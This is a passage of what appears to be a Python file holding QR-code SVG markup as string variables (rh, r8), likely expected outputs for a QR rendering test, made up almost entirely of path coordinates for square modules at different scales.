33 z M 24 18 L 24 21 L 27 21 L 27 18 z M 18 54 L 18 57 L 21 57 L 21 54 z M 30 27 L 30 30 L 33 30 L 33 27 z M 45 33 L 45 36 L 48 36 L 48 33 z M 42 27 L 42 30 L 45 30 L 45 27 z M 30 36 L 30 39 L 33 39 L 33 36 z M 54 60 L 54 63 L 57 63 L 57 60 z M 69 60 L 69 63 L 72 63 L 72 60 z M 63 12 L 63 15 L 66 15 L 66 12 z M 60 36 L 60 39 L 63 39 L 63 36 z M 12 69 L 12 72 L 15 72 L 15 69 z M 48 69 L 48 72 L 51 72 L 51 69 z M 12 30 L 12 33 L 15 33 L 15 30 z M 57 30 L 57 33 L 60 33 L 60 30 z M 72 30 L 72 33 L 75 33 L 75 30 z M 66 66 L 66 69 L 69 69 L 69 66 z M 21 24 L 21 27 L 24 27 L 24 24 z M 18 24 L 18 27 L 21 27 L 21 24 z M 39 48 L 39 51 L 42 51 L 42 48 z M 36 24 L 36 27 L 39 27 L 39 24 z M 42 45 L 42 48 L 45 48 L 45 45 z M 30 30 L 30 33 L 33 33 L 33 30 z M 27 30 L 27 33 L 30 33 L 30 30 z M 24 66 L 24 69 L 27 69 L 27 66 z M 45 18 L 45 21 L 48 21 L 48 18 z M 42 30 L 42 33 L 45 33 L 45 30 z M 60 18 L 60 21 L 63 21 L 63 18 z M 48 27 L 48 30 L 51 30 L 51 27 z M 63 21 L 63 24 L 66 24 L 66 21 z M 57 36 L 57 39 L 60 39 L 60 36 z M 54 12 L 54 15 L 57 15 L 57 12 z M 12 60 L 12 63 L 15 63 L 15 60 z M 48 60 L 48 63 L 51 63 L 51 60 z M 69 12 L 69 15 L 72 15 L 72 12 z M 66 36 L 66 39 L 69 39 L 69 36 z M 12 21 L 12 24 L 15 24 L 15 21 z M 21 54 L 21 57 L 24 57 L 24 54 z M 24 39 L 24 42 L 27 42 L 27 39 z M 21 21 L 21 24 L 24 24 L 24 21 z M 18 39 L 18 42 L 21 42 L 21 39 z M 39 57 L 39 60 L 42 60 L 42 57 z M 27 48 L 27 51 L 30 51 L 30 48 z M 24 24 L 24 27 L 27 27 L 27 24 z M 21 72 L 21 75 L 24 75 L 24 72 z M 42 48 L 42 51 L 45 51 L 45 48 z M 36 72 L 36 75 L 39 75 L 39 72 z M 30 21 L 30 24 L 33 24 L 33 21 z M 39 63 L 39 66 L 42 66 L 42 63 z M 57 66 L 57 69 L 60 69 L 60 66 z M 54 54 L 54 57 L 57 57 L 57 54 z M 69 42 L 69 45 L 72 45 L 72 42 z M 57 57 L 57 60 L 60 60 L 60 57 z M 51 45 L 51 48 L 54 48 L 54 45 z M 18 60 L 18 63 L 21 63 L 21 60 z M 12 12 L 12 15 L 15 15 L 15 12 z M 63 69 L 63 72 L 66 72 L 66 69 z M 24 54 L 24 57 L 27 57 L 27 54 z M 42 15 L 42 18 L 45 18 L 45 15 z M 36 63 L 36 66 L 39 66 L 39 63 z M 30 48 L 30 51 L 33 51 L 33 48 z M 54 72 L 54 75 L 57 75 L 57 72 z M 24 72 L 24 75 L 27 75 L 27 72 z M 45 48 L 45 51 L 48 51 L 48 48 z M 69 72 L 69 75 L 72 75 L 72 72 z M 63 24 L 63 27 L 66 27 L 66 24 z M 33 39 L 33 42 L 36 42 L 36 39 z M 57 63 L 57 66 L 60 66 L 60 63 z M 30 69 L 30 72 L 33 72 L 33 69 z M 48 57 L 48 60 L 51 60 L 51 57 z M 66 21 L 66 24 L 69 24 L 69 21 z M 63 39 L 63 42 L 66 42 L 66 39 z M 72 18 L 72 21 L 75 21 L 75 18 z M 66 54 L 66 57 L 69 57 L 69 54 z M 21 36 L 21 39 L 24 39 L 24 36 z M 18 12 L 18 15 L 21 15 L 21 12 z M 24 21 L 24 24 L 27 24 L 27 21 z M 39 27 L 39 30 L 42 30 L 42 27 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
rh = """<svg height="139.2mm" version="1.1" viewBox="0 0 139.2 139.2" width="139.2mm" xmlns="http://www.w3.org/2000/svg"><path d="M 96 48 L 96 52.8 L 100.8 52.8 L 100.8 48 z M 86.4 100.8 L 86.4 105.6 L 91.2 105.6 L 91.2 100.8 z M 76.8 24 L 76.8 28.8 L 81.6 28.8 L 81.6 24 z M 67.2 100.8 L 67.2 105.6 L 72.0 105.6 L 72.0 100.8 z M 19.2 115.2 L 19.2 120.0 L 24.0 120.0 L 24.0 115.2 z M 96 62.4 L 96 67.2 L 100.8 67.2 L 100.8 62.4 z M 86.4 38.4 L 86.4 43.2 L 91.2 43.2 L 91.2 38.4 z M 105.6 38.4 L 105.6 43.2 L 110.4 43.2 L 110.4 38.4 z M 81.6 100.8 L 81.6 105.6 L 86.4 105.6 L 86.4 100.8 z M 24 48 L 24 52.8 L 28.8 52.8 L 28.8 48 z M 19.2 67.2 L 19.2 72.0 L 24.0 72.0 L 24.0 67.2 z M 105.6 110.4 L 105.6 115.2 L 110.4 115.2 L 110.4 110.4 z M 57.6 43.2 L 57.6 48.0 L 62.4 48.0 L 62.4 43.2 z M 43.2 57.6 L 43.2 62.4 L 48.0 62.4 L 48.0 57.6 z M 38.4 19.2 L 38.4 24.0 L 43.2 24.0 L 43.2 19.2 z M 67.2 57.6 L 67.2 62.4 L 72.0 62.4 L 72.0 57.6 z M 62.4 19.2 L 62.4 24.0 L 67.2 24.0 L 67.2 19.2 z M 67.2 52.8 L 67.2 57.6 L 72.0 57.6 L 72.0 52.8 z M 96 33.6 L 96 38.4 L 100.8 38.4 L 100.8 33.6 z M 48 67.2 L 48 72.0 L 52.8 72.0 L 52.8 67.2 z M 76.8 48 L 76.8 52.8 L 81.6 52.8 L 81.6 48 z M 110.4 86.4 L 110.4 91.2 L 115.2 91.2 L 115.2 86.4 z M 100.8 28.8 L 100.8 33.6 L 105.6 33.6 L 105.6 28.8 z M 19.2 100.8 L 19.2 105.6 L 24.0 105.6 L 24.0 100.8 z M 86.4 24 L 86.4 28.8 L 91.2 28.8 L 91.2 24 z M 115.2 62.4 L 115.2 67.2 L 120.0 67.2 L 120.0 62.4 z M 105.6 62.4 L 105.6 67.2 L 110.4 67.2 L 110.4 62.4 z M 19.2 38.4 L 19.2 43.2 L 24.0 43.2 L 24.0 38.4 z M 115.2 38.4 L 115.2 43.2 L 120.0 43.2 L 120.0 38.4 z M 57.6 91.2 L 57.6 96.0 L 62.4 96.0 L 62.4 91.2 z M 38.4 67.2 L 38.4 72.0 L 43.2 72.0 L 43.2 67.2 z M 33.6 28.8 L 33.6 33.6 L 38.4 33.6 L 38.4 28.8 z M 28.8 48 L 28.8 52.8 L 33.6 52.8 L 33.6 48 z M 62.4 86.4 L 62.4 91.2 L 67.2 91.2 L 67.2 86.4 z M 57.6 28.8 L 57.6 33.6 L 62.4 33.6 L 62.4 28.8 z M 48 19.2 L 48 24.0 L 52.8 24.0 L 52.8 19.2 z M 38.4 96 L 38.4 100.8 L 43.2 100.8 L 43.2 96 z M 72 19.2 L 72 24.0 L 76.8 24.0 L 76.8 19.2 z M 62.4 96 L 62.4 100.8 L 67.2 100.8 L 67.2 96 z M 96 19.2 L 96 24.0 L 100.8 24.0 L 100.8 19.2 z M 100.8 81.6 L 100.8 86.4 L 105.6 86.4 L 105.6 81.6 z M 96 110.4 L 96 115.2 L 100.8 115.2 L 100.8 110.4 z M 86.4 28.8 L 86.4 33.6 L 91.2 33.6 L 91.2 28.8 z M 81.6 67.2 L 81.6 72.0 L 86.4 72.0 L 86.4 67.2 z M 28.8 100.8 L 28.8 105.6 L 33.6 105.6 L 33.6 100.8 z M 105.6 67.2 L 105.6 72.0 L 110.4 72.0 L 110.4 67.2 z M 19.2 24 L 19.2 28.8 L 24.0 28.8 L 24.0 24 z M 24 76.8 L 24 81.6 L 28.8 81.6 L 28.8 76.8 z M 57.6 76.8 L 57.6 81.6 L 62.4 81.6 L 62.4 76.8 z M 43.2 86.4 L 43.2 91.2 L 48.0 91.2 L 48.0 86.4 z M 33.6 105.6 L 33.6 110.4 L 38.4 110.4 L 38.4 105.6 z M 57.6 105.6 L 57.6 110.4 L 62.4 110.4 L 62.4 105.6 z M 72 91.2 L 72 96.0 L 76.8 96.0 L 76.8 91.2 z M 62.4 110.4 L 62.4 115.2 L 67.2 115.2 L 67.2 110.4 z M 91.2 96 L 91.2 100.8 L 96.0 100.8 L 96.0 96 z M 86.4 57.6 L 86.4 62.4 L 91.2 62.4 L 91.2 57.6 z M 48 96 L 48 100.8 L 52.8 100.8 L 52.8 96 z M 76.8 57.6 L 76.8 62.4 L 81.6 62.4 L 81.6 57.6 z M 115.2 96 L 115.2 100.8 L 120.0 100.8 L 120.0 96 z M 105.6 19.2 L 105.6 24.0 L 110.4 24.0 L 110.4 19.2 z M 100.8 57.6 L 100.8 62.4 L 105.6 62.4 L 105.6 57.6 z M 115.2 33.6 L 115.2 38.4 L 120.0 38.4 L 120.0 33.6 z M 28.8 105.6 L 28.8 110.4 L 33.6 110.4 L 33.6 105.6 z M 105.6 91.2 L 105.6 96.0 L 110.4 96.0 L 110.4 91.2 z M 19.2 86.4 L 19.2 91.2 L 24.0 91.2 L 24.0 86.4 z M 28.8 76.8 L 28.8 81.6 L 33.6 81.6 L 33.6 76.8 z M 33.6 100.8 L 33.6 105.6 L 38.4 105.6 L 38.4 100.8 z M 48 86.4 L 48 91.2 L 52.8 91.2 L 52.8 86.4 z M 72 67.2 L 72 72.0 L 76.8 72.0 L 76.8 67.2 z M 100.8 48 L 100.8 52.8 L 105.6 52.8 L 105.6 48 z M 86.4 43.2 L 86.4 48.0 L 91.2 48.0 L 91.2 43.2 z M 76.8 81.6 L 76.8 86.4 L 81.6 86.4 L 81.6 81.6 z M 100.8 72 L 100.8 76.8 L 105.6 76.8 L 105.6 72 z M 91.2 19.2 L 91.2 24.0 L 96.0 24.0 L 96.0 19.2 z M 115.2 19.2 L 115.2 24.0 L 120.0 24.0 L 120.0 19.2 z M 19.2 72 L 19.2 76.8 L 24.0 76.8 L 24.0 72 z M 33.6 48 L 33.6 52.8 L 38.4 52.8 L 38.4 48 z M 28.8 28.8 L 28.8 33.6 L 33.6 33.6 L 33.6 28.8 z M 24 67.2 L 24 72.0 L 28.8 72.0 L 28.8 67.2 z M 57.6 48 L 57.6 52.8 L 62.4 52.8 L 62.4 48 z M 62.4 52.8 L 62.4 57.6 L 67.2 57.6 L 67.2 52.8 z M 48 38.4 L 48 43.2 L 52.8 43.2 L 52.8 38.4 z M 72 38.4 L 72 43.2 L 76.8 43.2 L 76.8 38.4 z M 67.2 38.4 L 67.2 43.2 L 72.0 43.2 L 72.0 38.4 z M 62.4 115.2 L 62.4 120.0 L 67.2 120.0 L 67.2 115.2 z M 96 38.4 L 96 43.2 L 100.8 43.2 L 100.8 38.4 z M 76.8 52.8 L 76.8 57.6 L 81.6 57.6 L 81.6 52.8 z M 19.2 105.6 L 19.2 110.4 L 24.0 110.4 L 24.0 105.6 z M 86.4 48 L 86.4 52.8 L 91.2 52.8 L 91.2 48 z M 76.8 105.6 L 76.8 110.4 L 81.6 110.4 L 81.6 105.6 z M 105.6 48 L 105.6 52.8 L 110.4 52.8 L 110.4 48 z M 19.2 43.2 L 19.2 48.0 L 24.0 48.0 L 24.0 43.2 z M 81.6 110.4 L 81.6 115.2 L 86.4 115.2 L 86.4 110.4 z M 115.2 43.2 L 115.2 48.0 L 120.0 48.0 L 120.0 43.2 z M 24 19.2 L 24 24.0 L 28.8 24.0 L 28.8 19.2 z M 19.2 57.6 L 19.2 62.4 L 24.0 62.4 L 24.0 57.6 z M 62.4 81.6 L 62.4 86.4 L 67.2 86.4 L 67.2 81.6 z M 57.6 33.6 L 57.6 38.4 L 62.4 38.4 L 62.4 33.6 z M 38.4 48 L 38.4 52.8 L 43.2 52.8 L 43.2 48 z M 48 24 L 48 28.8 L 52.8 28.8 L 52.8 24 z M 38.4 100.8 L 38.4 105.6 L 43.2 105.6 L 43.2 100.8 z M 86.4 76.8 L 86.4 81.6 L 91.2 81.6 L 91.2 76.8 z M 43.2 115.2 L 43.2 120.0 L 48.0 120.0 L 48.0 115.2 z M 76.8 38.4 L 76.8 43.2 L 81.6 43.2 L 81.6 38.4 z M 48 115.2 L 48 120.0 L 52.8 120.0 L 52.8 115.2 z M 67.2 115.2 L 67.2 120.0 L 72.0 120.0 L 72.0 115.2 z M 72 115.2 L 72 120.0 L 76.8 120.0 L 76.8 115.2 z M 91.2 62.4 L 91.2 67.2 L 96.0 67.2 L 96.0 62.4 z M 86.4 33.6 L 86.4 38.4 L 91.2 38.4 L 91.2 33.6 z M 81.6 62.4 L 81.6 67.2 L 86.4 67.2 L 86.4 62.4 z M 96 115.2 L 96 120.0 L 100.8 120.0 L 100.8 115.2 z M 105.6 72 L 105.6 76.8 L 110.4 76.8 L 110.4 72 z M 19.2 28.8 L 19.2 33.6 L 24.0 33.6 L 24.0 28.8 z M 100.8 100.8 L 100.8 105.6 L 105.6 105.6 L 105.6 100.8 z M 57.6 81.6 L 57.6 86.4 L 62.4 86.4 L 62.4 81.6 z M 38.4 57.6 L 38.4 62.4 L 43.2 62.4 L 43.2 57.6 z M 33.6 19.2 L 33.6 24.0 L 38.4 24.0 L 38.4 19.2 z M 28.8 57.6 L 28.8 62.4 L 33.6 62.4 L 33.6 57.6 z M 62.4 57.6 L 62.4 62.4 L 67.2 62.4 L 67.2 57.6 z M 67.2 91.2 L 67.2 96.0 L 72.0 96.0 L 72.0 91.2 z M 48 28.8 L 48 33.6 L 52.8 33.6 L 52.8 28.8 z M 62.4 105.6 L 62.4 110.4 L 67.2 110.4 L 67.2 105.6 z M 86.4 62.4 L 86.4 67.2 L 91.2 67.2 L 91.2 62.4 z M 48 100.8 L 48 105.6 L 52.8 105.6 L 52.8 100.8 z M 76.8 62.4 L 76.8 67.2 L 81.6 67.2 L 81.6 62.4 z M 24 115.2 L 24 120.0 L 28.8 120.0 L 28.8 115.2 z M 100.8 91.2 L 100.8 96.0 L 105.6 96.0 L 105.6 91.2 z M 96 100.8 L 96 105.6 L 100.8 105.6 L 100.8 100.8 z M 81.6 76.8 L 81.6 81.6 L 86.4 81.6 L 86.4 76.8 z M 115.2 76.8 L 115.2 81.6 L 120.0 81.6 L 120.0 76.8 z M 76.8 115.2 L 76.8 120.0 L 81.6 120.0 L 81.6 115.2 z M 19.2 91.2 L 19.2 96.0 L 24.0 96.0 L 24.0 91.2 z M 33.6 67.2 L 33.6 72.0 L 38.4 72.0 L 38.4 67.2 z M 24 86.4 L 24 91.2 L 28.8 91.2 L 28.8 86.4 z M 62.4 72 L 62.4 76.8 L 67.2 76.8 L 67.2 72 z M 43.2 19.2 L 43.2 24.0 L 48.0 24.0 L 48.0 19.2 z M 33.6 96 L 33.6 100.8 L 38.4 100.8 L 38.4 96 z M 67.2 19.2 L 67.2 24.0 L 72.0 24.0 L 72.0 19.2 z M 57.6 96 L 57.6 100.8 L 62.4 100.8 L 62.4 96 z M 48 91.2 L 48 96.0 L 52.8 96.0 L 52.8 91.2 z M 96 72 L 96 76.8 L 100.8 76.8 L 100.8 72 z M 86.4 67.2 L 86.4 72.0 L 91.2 72.0 L 91.2 67.2 z M 48 105.6 L 48 110.4 L 52.8 110.4 L 52.8 105.6 z M 76.8 86.4 L 76.8 91.2 L 81.6 91.2 L 81.6 86.4 z M 110.4 48 L 110.4 52.8 L 115.2 52.8 L 115.2 48 z M 105.6 28.8 L 105.6 33.6 L 110.4 33.6 L 110.4 28.8 z M 100.8 67.2 L 100.8 72.0 L 105.6 72.0 L 105.6 67.2 z M 81.6 91.2 L 81.6 96.0 L 86.4 96.0 L 86.4 91.2 z M 115.2 24 L 115.2 28.8 L 120.0 28.8 L 120.0 24 z M 28.8 115.2 L 28.8 120.0 L 33.6 120.0 L 33.6 115.2 z M 33.6 62.4 L 33.6 67.2 L 38.4 67.2 L 38.4 62.4 z M 28.8 33.6 L 28.8 38.4 L 33.6 38.4 L 33.6 33.6 z M 57.6 52.8 L 57.6 57.6 L 62.4 57.6 L 62.4 52.8 z M 38.4 28.8 L 38.4 33.6 L 43.2 33.6 L 43.2 28.8 z M 28.8 86.4 L 28.8 91.2 L 33.6 91.2 L 33.6 86.4 z M 48 43.2 L 48 48.0 L 52.8 48.0 L 52.8 43.2 z M 72 52.8 L 72 57.6 L 76.8 57.6 L 76.8 52.8 z M 67.2 43.2 L 67.2 48.0 L 72.0 48.0 L 72.0 43.2 z M 48 57.6 L 48 62.4 L 52.8 62.4 L 52.8 57.6 z M 86.4 96 L 86.4 100.8 L 91.2 100.8 L 91.2 96 z M 110.4 96 L 110.4 100.8 L 115.2 100.8 L 115.2 96 z M 100.8 19.2 L 100.8 24.0 L 105.6 24.0 L 105.6 19.2 z M 96 57.6 L 96 62.4 L 100.8 62.4 L 100.8 57.6 z M 19.2 110.4 L 19.2 115.2 L 24.0 115.2 L 24.0 110.4 z M 76.8 110.4 L 76.8 115.2 L 81.6 115.2 L 81.6 110.4 z M 19.2 48 L 19.2 52.8 L 24.0 52.8 L 24.0 48 z M 91.2 48 L 91.2 52.8 L 96.0 52.8 L 96.0 48 z M 115.2 48 L 115.2 52.8 L 120.0 52.8 L 120.0 48 z M 105.6 105.6 L 105.6 110.4 L 110.4 110.4 L 110.4 105.6 z M 33.6 38.4 L 33.6 43.2 L 38.4 43.2 L 38.4 38.4 z M 28.8 38.4 L 28.8 43.2 L 33.6 43.2 L 33.6 38.4 z M 62.4 76.8 L 62.4 81.6 L 67.2 81.6 L 67.2 76.8 z M 57.6 38.4 L 57.6 43.2 L 62.4 43.2 L 62.4 38.4 z M 67.2 72 L 67.2 76.8 L 72.0 76.8 L 72.0 72 z M 48 48 L 48 52.8 L 52.8 52.8 L 52.8 48 z M 43.2 48 L 43.2 52.8 L 48.0 52.8 L 48.0 48 z M 38.4 105.6 L 38.4 110.4 L 43.2 110.4 L 43.2 105.6 z M 72 28.8 L 72 33.6 L 76.8 33.6 L 76.8 28.8 z M 67.2 48 L 67.2 52.8 L 72.0 52.8 L 72.0 48 z M 96 28.8 L 96 33.6 L 100.8 33.6 L 100.8 28.8 z M 76.8 43.2 L 76.8 48.0 L 81.6 48.0 L 81.6 43.2 z M 100.8 33.6 L 100.8 38.4 L 105.6 38.4 L 105.6 33.6 z M 91.2 57.6 L 91.2 62.4 L 96.0 62.4 L 96.0 57.6 z M 86.4 19.2 L 86.4 24.0 L 91.2 24.0 L 91.2 19.2 z M 19.2 96 L 19.2 100.8 L 24.0 100.8 L 24.0 96 z M 76.8 96 L 76.8 100.8 L 81.6 100.8 L 81.6 96 z M 110.4 19.2 L 110.4 24.0 L 115.2 24.0 L 115.2 19.2 z M 105.6 57.6 L 105.6 62.4 L 110.4 62.4 L 110.4 57.6 z M 19.2 33.6 L 19.2 38.4 L 24.0 38.4 L 24.0 33.6 z M 33.6 86.4 L 33.6 91.2 L 38.4 91.2 L 38.4 86.4 z M 38.4 62.4 L 38.4 67.2 L 43.2 67.2 L 43.2 62.4 z M 33.6 33.6 L 33.6 38.4 L 38.4 38.4 L 38.4 33.6 z M 28.8 62.4 L 28.8 67.2 L 33.6 67.2 L 33.6 62.4 z M 62.4 91.2 L 62.4 96.0 L 67.2 96.0 L 67.2 91.2 z M 43.2 76.8 L 43.2 81.6 L 48.0 81.6 L 48.0 76.8 z M 38.4 38.4 L 38.4 43.2 L 43.2 43.2 L 43.2 38.4 z M 33.6 115.2 L 33.6 120.0 L 38.4 120.0 L 38.4 115.2 z M 67.2 76.8 L 67.2 81.6 L 72.0 81.6 L 72.0 76.8 z M 57.6 115.2 L 57.6 120.0 L 62.4 120.0 L 62.4 115.2 z M 48 33.6 L 48 38.4 L 52.8 38.4 L 52.8 33.6 z M 62.4 100.8 L 62.4 105.6 L 67.2 105.6 L 67.2 100.8 z M 91.2 105.6 L 91.2 110.4 L 96.0 110.4 L 96.0 105.6 z M 86.4 86.4 L 86.4 91.2 L 91.2 91.2 L 91.2 86.4 z M 110.4 67.2 L 110.4 72.0 L 115.2 72.0 L 115.2 67.2 z M 91.2 91.2 L 91.2 96.0 L 96.0 96.0 L 96.0 91.2 z M 81.6 72 L 81.6 76.8 L 86.4 76.8 L 86.4 72 z M 28.8 96 L 28.8 100.8 L 33.6 100.8 L 33.6 96 z M 19.2 19.2 L 19.2 24.0 L 24.0 24.0 L 24.0 19.2 z M 100.8 110.4 L 100.8 115.2 L 105.6 115.2 L 105.6 110.4 z M 38.4 86.4 L 38.4 91.2 L 43.2 91.2 L 43.2 86.4 z M 67.2 24 L 67.2 28.8 L 72.0 28.8 L 72.0 24 z M 57.6 100.8 L 57.6 105.6 L 62.4 105.6 L 62.4 100.8 z M 48 76.8 L 48 81.6 L 52.8 81.6 L 52.8 76.8 z M 86.4 115.2 L 86.4 120.0 L 91.2 120.0 L 91.2 115.2 z M 38.4 115.2 L 38.4 120.0 L 43.2 120.0 L 43.2 115.2 z M 72 76.8 L 72 81.6 L 76.8 81.6 L 76.8 76.8 z M 110.4 115.2 L 110.4 120.0 L 115.2 120.0 L 115.2 115.2 z M 100.8 38.4 L 100.8 43.2 L 105.6 43.2 L 105.6 38.4 z M 52.8 62.4 L 52.8 67.2 L 57.6 67.2 L 57.6 62.4 z M 91.2 100.8 L 91.2 105.6 L 96.0 105.6 L 96.0 100.8 z M 48 110.4 L 48 115.2 L 52.8 115.2 L 52.8 110.4 z M 76.8 91.2 L 76.8 96.0 L 81.6 96.0 L 81.6 91.2 z M 105.6 33.6 L 105.6 38.4 L 110.4 38.4 L 110.4 33.6 z M 100.8 62.4 L 100.8 67.2 L 105.6 67.2 L 105.6 62.4 z M 115.2 28.8 L 115.2 33.6 L 120.0 33.6 L 120.0 28.8 z M 105.6 86.4 L 105.6 91.2 L 110.4 91.2 L 110.4 86.4 z M 33.6 57.6 L 33.6 62.4 L 38.4 62.4 L 38.4 57.6 z M 28.8 19.2 L 28.8 24.0 L 33.6 24.0 L 33.6 19.2 z M 38.4 33.6 L 38.4 38.4 L 43.2 38.4 L 43.2 33.6 z M 62.4 43.2 L 62.4 48.0 L 67.2 48.0 L 67.2 43.2 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
r6 = rt
r8 = """<svg height="23.2mm" version="1.1" viewBox="0 0 23.2 23.2" width="23.2mm" xmlns="http://www.w3.org/2000/svg"><path d="M 16 8 L 16 8.8 L 16.8 8.8 L 16.8 8 z M 14.4 16.8 L 14.4 17.6 L 15.2 17.6 L 15.2 16.8 z M 12.8 4 L 12.8 4.8 L 13.6 4.8 L 13.6 4 z M 11.2 16.8 L 11.2 17.6 L 12.0 17.6 L 12.0 16.8 z M 3.2 19.2 L 3.2 20.0 L 4.0 20.0 L 4.0 19.2 z M 16 10.4 L 16 11.2 L 16.8 11.2 L 16.8 10.4 z M 14.4 6.4 L 14.4 7.2 L 15.2 7.2 L 15.2 6.4 z M 17.6 6.4 L 17.6 7.2 L 18.4 7.2 L 18.4 6.4 z M 13.6 16.8 L 13.6 17.6 L 14.4 17.6 L 14.4 16.8 z M 4 8 L 4 8.8 L 4.8 8.8 L 4.8 8 z M 3.2 11.2 L 3.2 12.0 L 4.0 12.0 L 4.0 11.2 z M 17.6 18.4 L 17.6 19.2 L 18.4 19.2 L 18.4 18.4 z M 9.6 7.2 L 9.6 8.0 L 10.4 8.0 L 10.4 7.2 z M 7.2 9.6 L 7.2 10.4 L 8.0 10.4 L 8.0 9.6 z M 6.4 3.2 L 6.4 4.0 L 7.2 4.0 L 7.2 3.2 z M 11.2 9.6 L 11.2 10.4 L 12.0 10.4 L 12.0 9.6 z M 10.4 3.2 L 10.4 4.0 L 11.2 4.0 L 11.2 3.2 z M 11.2 8.8 L 11.2 9.6 L 12.0 9.6 L 12.0 8.8 z M 16 5.6 L 16 6.4 L 16.8 6.4 L 16.8 5.6 z M 8 11.2 L 8 12.0 L 8.8 12.0 L 8.8 11.2 z M 12.8 8 L 12.8 8.8 L 13.6 8.8 L 13.6 8 z M 18.4 14.4 L 18.4 15.2 L 19.2 15.2 L 19.2 14.4 z M 16.8 4.8 L 16.8 5.6 L 17.6 5.6 L 17.6 4.8 z M 3.2 16.8 L 3.2 17.6 L 4.0 17.6 L 4.0 16.8 z M 14.4 4 L 14.4 4.8 L 15.2 4.8 L 15.2 4 z M 19.2 10.4 L 19.2 11.2 L 20.0 11.2 L 20.0 10.4 z M 17.6 10.4 L 17.6 11.2 L 18.4 11.2 L 18.4 10.4 z M 3.2 6.4 L 3.2 7.2 L 4.0 7.2 L 4.0 6.4 z M 19.2 6.4 L 19.2 7.2 L 20.0 7.2 L 20.0 6.4 z M 9.6 15.2 L 9.6 16.0 L 10.4 16.0 L 10.4 15.2 z M 6.4 11.2 L 6.4 12.0 L 7.2 12.0 L 7.2 11.2 z M 5.6 4.8 L 5.6 5.6 L 6.4 5.6 L 6.4 4.8 z M 4.8 8 L 4.8 8.8 L 5.6 8.8 L 5.6 8 z M 10.4 14.4 L 10.4 15.2 L 11.2 15.2 L 11.2 14.4 z M 9.6 4.8 L 9.6 5.6 L 10.4 5.6 L 10.4 4.8 z M 8 3.2 L 8 4.0 L 8.8 4.0 L 8.8 3.2 z M 6.4 16 L 6.4 16.8 L 7.2 16.8 L 7.2 16 z M 12 3.2 L 12 4.0 L 12.8 4.0 L 12.8 3.2 z M 10.4 16 L 10.4 16.8 L 11.2 16.8 L 11.2 16 z M 16 3.2 L 16 4.0 L 16.8 4.0 L 16.8 3.2 z M 16.8 13.6 L 16.8 14.4 L 17.6 14.4 L 17.6 13.6 z M 16 18.4 L 16 19.2 L 16.8 19.2 L 16.8 18.4 z M 14.4 4.8 L 14.4 5.6 L 15.2 5.6 L 15.2 4.8 z M 13.6 11.2 L 13.6 12.0 L 14.4 12.0 L 14.4 11.2 z M 4.8 16.8 L 4.8 17.6 L 5.6 17.6 L 5.6 16.8 z M 17.6 11.2 L 17.6 12.0 L 18.4 12.0 L 18.4 11.2 z M 3.2 4 L 3.2 4.8 L 4.0 4.8 L 4.0 4 z M 4 12.8 L 4 13.6 L 4.8 13.6 L 4.8 12.8 z M 9.6 12.8 L 9.6 13.6 L 10.4 13.6 L 10.4 12.8 z M 7.2 14.4 L 7.2 15.2 L 8.0 15.2 L 8.0 14.4 z M 5.6 17.6 L 5.6 18.4 L 6.4 18.4 L 6.4 17.6 z M 9.6 17.6 L 9.6 18.4 L 10.4 18.4 L 10.4 17.6 z M 12 15.2 L 12 16.0 L 12.8 16.0 L 12.8 15.2 z M 10.4 18.4 L 10.4 19.2 L 11.2 19.2 L 11.2 18.4 z M 15.2 16 L 15.2 16.8 L 16.0 16.8 L 16.0 16 z M 14.4 9.6 L 14.4 10.4 L 15.2 10.4 L 15.2 9.6 z M 8 16 L 8 16.8 L 8.8 16.8 L 8.8 16 z M 12.8 9.6 L 12.8 10.4 L 13.6 10.4 L 13.6 9.6 z M 19.2 16 L 19.2 16.8 L 20.0 16.8 L 20.0 16 z M 17.6 3.2 L 17.6 4.0 L 18.4 4.0 L 18.4 3.2 z M 16.8 9.6 L 16.8 10.4 L 17.6 10.4 L 17.6 9.6 z M 19.2 5.6 L 19.2 6.4 L 20.0 6.4 L 20.0 5.6 z M 4.8 17.6 L 4.8 18.4 L 5.6 18.4 L 5.6 17.6 z M 17.6 15.2 L 17.6 16.0 L 18.4 16.0 L 18.4 15.2 z M 3.2 14.4 L 3.2 15.2 L 4.0 15.2 L 4.0 14.4 z M 4.8 12.8 L 4.8 13.6 L 5.6 13.6 L 5.6 12.8 z M 5.6 16.8 L 5.6 17.6 L 6.4 17.6 L 6.4 16.8 z M 8 14.4 L 8 15.2 L 8.8 15.2 L 8.8 14.4 z M 12 11.2 L 12 12.0 L 12.8 12.0 L 12.8 11.2 z M 16.8 8 L 16.8 8.8 L 17.6 8.8 L 17.6 8 z M 14.4 7.2 L 14.4 8.0 L 15.2 8.0 L 15.2 7.2 z M 12.8 13.6 L 12.8 14.4 L 13.6 14.4 L 13.6 13.6 z M 16.8 12 L 16.8 12.8 L 17.6 12.8 L 17.6 12 z M 15.2 3.2 L 15.2 4.0 L 16.0 4.0 L 16.0 3.2 z M 19.2 3.2 L 19.2 4.0 L 20.0 4.0 L 20.0 3.2 z M 3.2 12 L 3.2 12.8 L 4.0 12.8 L 4.0 12 z M 5.6 8 L 5.6 8.8 L 6.4 8.8 L 6.4 8 z M 4.8 4.8 L 4.8 5.6 L 5.6 5.6 L 5.6 4.8 z M 4 11.2 L 4 12.0 L 4.8 12.0 L 4.8 11.2 z M 9.6 8 L 9.6 8.8 L 10.4 8.8 L 10.4 8 z M 10.4 8.8 L 10.4 9.6 L 11.2 9.6 L 11.2 8.8 z M 8 6.4 L 8 7.2 L 8.8 7.2 L 8.8 6.4 z M 12 6.4 L 12 7.2 L 12.8 7.2 L 12.8 6.4 z M 11.2 6.4 L 11.2 7.2 L 12.0 7.2 L 12.0 6.4 z M 10.4 19.2 L 10.4 20.0 L 11.2 20.0 L 11.2 19.2 z M 16 6.4 L 16 7.2 L 16.8 7.2 L 16.8 6.4 z M 12.8 8.8 L 12.8 9.6 L 13.6 9.6 L 13.6 8.8 z M 3.2 17.6 L 3.2 18.4 L 4.0 18.4 L 4.0 17.6 z M 14.4 8 L 14.4 8.8 L 15.2 8.8 L 15.2 8 z M 12.8 17.6 L 12.8 18.4 L 13.6 18.4 L 13.6 17.6 z M 17.6 8 L 17.6 8.8 L 18.4 8.8 L 18.4 8 z M 3.2 7.2 L 3.2 8.0 L 4.0 8.0 L 4.0 7.2 z M 13.6 18.4 L 13.6 19.2 L 14.4 19.2 L 14.4 18.4 z M 19.2 7.2 L 19.2 8.0 L 20.0 8.0 L 20.0 7.2 z M 4 3.2 L 4 4.0 L 